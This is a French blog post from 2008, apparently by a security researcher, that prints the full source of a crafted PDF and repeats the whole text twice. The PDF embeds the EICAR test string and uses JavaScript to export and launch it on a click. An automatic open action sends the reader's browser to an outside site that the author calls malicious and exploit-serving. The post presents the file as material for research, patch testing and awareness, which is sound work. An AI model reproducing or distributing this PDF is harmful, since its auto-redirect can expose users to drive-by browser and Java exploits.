24 octobre 2008
5
24
/10
/octobre
/2008
00:32
De récentes investigations sur les nouveaux vecteurs viraux, m'ont amené à m'interroger et me documenter sur les problématiques liées aux fichiers PDF.
Depuis longtemps, pour ne pas dire depuis le début, ce format (PDF) a été considéré comme "sûr".
En fait, il garantissait surtout une impression conforme à la mise en forme originale du document, lors de sa création.
Je tiens donc à recommander les lectures suivantes concernant les PDF :
- le blog de Didier Stevens
- cet article évoquant la course actuelle au PDF "malveillant"
Fort de ces lectures et de mes propres recherches, je vous fournis le PDF suivant :
- embarque un EICAR, généré à la demande via un bouton dans le document.
- si ouvert sur une version 7 (7.0 par exemple), le PDF provoque l'ouverture du navigateur par défaut de la machine, et l'envoie sur un site russe malveillant (qui tente d'exploiter diverses failles sur le navigateur, voire sur la machine Java selon les cas).
Attention, ce PDF est réellement dangereux si vous ne prenez pas de précauions !
Je le livre à fins de recherche, de validations d'applications de correctifs (voire de réglages sécurité) sur Acrobat Reader, ainsi que dans un but démonstratif et de sensibilisation.
Je ne peux être tenu pour responsable des éventuels dommages que subirait votre système informatique si vous ne prenez pas les précautions nécessaires lors de l'utilisation de ce PDF.
----------------------------------------------------------------------------
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 12 0 R
/Names << /EmbeddedFiles << /Names [(EICAR.txt) 9 0 R] >> >>
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Annots [7 0 R]
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 427 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL
(CE PDF A l'AIR INNOCENT, POURTANT IL EMBARQUE 2 CHARGES VIRALES !) Tj
<58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A> '
() '
(Il suffit de cliquer a l'interieur du rectangle pour lancer la generation de EICAR.) '
() '
(Click here) '
ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
7 0 obj
<<
/Type /Annot
/Subtype /Link
/Rect [65 620 130 640]
/Border [16 16 1]
/A 8 0 R
>>
endobj
8 0 obj
<<
/Type /Action
/S /JavaScript
/JS (this.exportDataObject({ cName: "EICAR.txt", nLaunch: 2 });)
>>
endobj
9 0 obj
<<
/Type /Filespec
/F (EICAR.txt)
/EF << /F 10 0 R >>
>>
endobj
10 0 obj
<<
/Type /#45mbeddedFile
/Length 208
/Filter /ASCIIHexDecode
>>
stream
58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A>
endstream
>>
endobj
12 0 obj
<<
/Type /Action
/S /URI
/URI (http://hancockparkschool.org)
>>
endobj
xref
0 11
0000000000 65535 f
0000000012 00000 n
0000000152 00000 n
0000000208 00000 n
0000000277 00000 n
0000000500 00000 n
0000000986 00000 n
0000001110 00000 n
0000001225 00000 n
0000001352 00000 n
0000001436 00000 n
trailer
<<
/Size 11
/Root 1 0 R
>>
startxref
1763
%%EOF
-------------------------------------------------------------------------------------
Détection antivirale de cette page :
J'ai été informé que cette page (mon blog) était détectée par Avira Antivir :
http://original.avira.com/fr/threats/JS_Dldr_Agent_BJZ_details.html
Alors, non, il ne s'agit pas du PDF !
La raison est que j'ai laissé en clair des liens vers des serveurs malveillants (article précédent) notamment le faux "msn analytics". Antivir annonce un script, alors qu'il n'y en a pas dans la page ! (iframe désactivées par syntaxe volontairement erronnée)
Il semble donc qu'Antivir se base sur une simple détection d'URL dans du texte simple...
Depuis longtemps, pour ne pas dire depuis le début, ce format (PDF) a été considéré comme "sûr".
En fait, il garantissait surtout une impression conforme à la mise en forme originale du document, lors de sa création.
Je tiens donc à recommander les lectures suivantes concernant les PDF :
- le blog de Didier Stevens
- cet article évoquant la course actuelle au PDF "malveillant"
Fort de ces lectures et de mes propres recherches, je vous fournis le PDF suivant :
- embarque un EICAR, généré à la demande via un bouton dans le document.
- si ouvert sur une version 7 (7.0 par exemple), le PDF provoque l'ouverture du navigateur par défaut de la machine, et l'envoie sur un site russe malveillant (qui tente d'exploiter diverses failles sur le navigateur, voire sur la machine Java selon les cas).
Attention, ce PDF est réellement dangereux si vous ne prenez pas de précauions !
Je le livre à fins de recherche, de validations d'applications de correctifs (voire de réglages sécurité) sur Acrobat Reader, ainsi que dans un but démonstratif et de sensibilisation.
Je ne peux être tenu pour responsable des éventuels dommages que subirait votre système informatique si vous ne prenez pas les précautions nécessaires lors de l'utilisation de ce PDF.
----------------------------------------------------------------------------
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 12 0 R
/Names << /EmbeddedFiles << /Names [(EICAR.txt) 9 0 R] >> >>
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Annots [7 0 R]
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 427 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL
(CE PDF A l'AIR INNOCENT, POURTANT IL EMBARQUE 2 CHARGES VIRALES !) Tj
<58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A> '
() '
(Il suffit de cliquer a l'interieur du rectangle pour lancer la generation de EICAR.) '
() '
(Click here) '
ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
7 0 obj
<<
/Type /Annot
/Subtype /Link
/Rect [65 620 130 640]
/Border [16 16 1]
/A 8 0 R
>>
endobj
8 0 obj
<<
/Type /Action
/S /JavaScript
/JS (this.exportDataObject({ cName: "EICAR.txt", nLaunch: 2 });)
>>
endobj
9 0 obj
<<
/Type /Filespec
/F (EICAR.txt)
/EF << /F 10 0 R >>
>>
endobj
10 0 obj
<<
/Type /#45mbeddedFile
/Length 208
/Filter /ASCIIHexDecode
>>
stream
58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A>
endstream
>>
endobj
12 0 obj
<<
/Type /Action
/S /URI
/URI (http://hancockparkschool.org)
>>
endobj
xref
0 11
0000000000 65535 f
0000000012 00000 n
0000000152 00000 n
0000000208 00000 n
0000000277 00000 n
0000000500 00000 n
0000000986 00000 n
0000001110 00000 n
0000001225 00000 n
0000001352 00000 n
0000001436 00000 n
trailer
<<
/Size 11
/Root 1 0 R
>>
startxref
1763
%%EOF
-------------------------------------------------------------------------------------
Détection antivirale de cette page :
J'ai été informé que cette page (mon blog) était détectée par Avira Antivir :
http://original.avira.com/fr/threats/JS_Dldr_Agent_BJZ_details.html
Alors, non, il ne s'agit pas du PDF !
La raison est que j'ai laissé en clair des liens vers des serveurs malveillants (article précédent) notamment le faux "msn analytics". Antivir annonce un script, alors qu'il n'y en a pas dans la page ! (iframe désactivées par syntaxe volontairement erronnée)
Il semble donc qu'Antivir se base sur une simple détection d'URL dans du texte simple...
Partager cet article
